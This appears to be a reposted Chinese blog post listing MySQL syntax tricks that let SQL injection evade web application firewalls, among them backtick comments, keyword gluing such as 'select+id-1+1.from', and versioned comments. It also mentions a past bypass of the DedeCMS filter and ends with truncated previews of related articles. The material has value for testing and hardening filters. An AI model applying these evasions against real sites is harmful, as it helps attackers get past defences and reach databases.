waf 繞過的技巧

2021-09-11 11:25:01 字數 1930 閱讀 9026

livers · 2013/05/31 17:41

研究過國內外的waf。分享一些 奇淫絕技。

mysql

過空格和一些正則。

mysql> select`version`() 

-> ;

+----------------------+

| `version`() |

+----------------------+

| 5.1.50-community-log |

+----------------------+

1 row in set (0.00 sec)

複製**

乙個更好玩的技巧,這個`控制符可以當注釋符用(限定條件)。

mysql> select id from qs_admins where id=1;`dfff and comment it; 

+----+

| id |

+----+

| 1 |

+----+

1 row in set (0.00 sec)

複製**

usage : where  id ='0'`'***xcomment on.

mysql> select id from qs_admins;  

+----+

| id |

+----+

| 1 |

+----+

1 row in set (0.00 sec)

mysql> select+id-1+1.from qs_admins;

+----------+

| +id-1+1. |

+----------+

| 1 |

+----------+

1 row in set (0.00 sec)

mysql> select-id-1+3.from qs_admins;

+----------+

| -id-1+3. |

+----------+

| 1 |

+----------+

1 row in set (0.00 sec)

複製**

(有些人不是一直在說關鍵字怎麼過?過濾乙個from ...    就是這樣連起來過)

mysql> select@^1.from qs_admins;  

+------|+

| @^1. |

+------|+

| null |

+------|+

複製**

這個是bypass  曾經dedecms filter .

或者這樣也是ok.

mysql> select-count(id)test from qs_admins;  

+------|+

| test |

+------|+

| -1 |

+------|+

1 row in set (0.00 sec)

複製**

mysql> /\*!40000select\*/ id from qs_admins;  

+----+

| id |

+----+

|  1 |

+----+

1 row in set (0.00 sec)

複製**

先分享這麼多,哈。

WAF 繞過方法

通常,即使繞過了waf的防護,前提條件是後端伺服器是否存在對應的漏洞,後端在開發時一定要在 中加入引數的過濾與校驗,不能只指望waf在中間進行防護,減少威脅面,編寫安全的 才是正確的做法。在bash shell中,問號?表示萬用字元,可以替換任意的單個字元 非空 表示萬用字元,可以匹配任意長度 包括...

waf繞過注入

waf 是什麼?安全是乙個不斷對抗的過程,有防護手段,就有相應的繞過手段。滲透測試過程中,waf 是必定會遇到的,如何繞過 waf 就是乙個問題。waf繞過的手段千變萬化,分為3類 白盒繞過 黑盒繞過 fuzz繞過 白盒繞過 如果繞過 白盒下的繞過主要針對原始碼進行審計,分析函式功能,構造特定的包進...

WAF繞過小結

瀏覽器向伺服器傳送請求的時候必須指明請求型別 一般是get或者post 如有必要,瀏覽器還可以選擇傳送其他的請求頭。大多數請求頭並不是必需的,但content length除外。對於post請求來說content length必須出現。大多數waf都會較全面地檢測來自get請求的攻擊,有選擇地檢測來...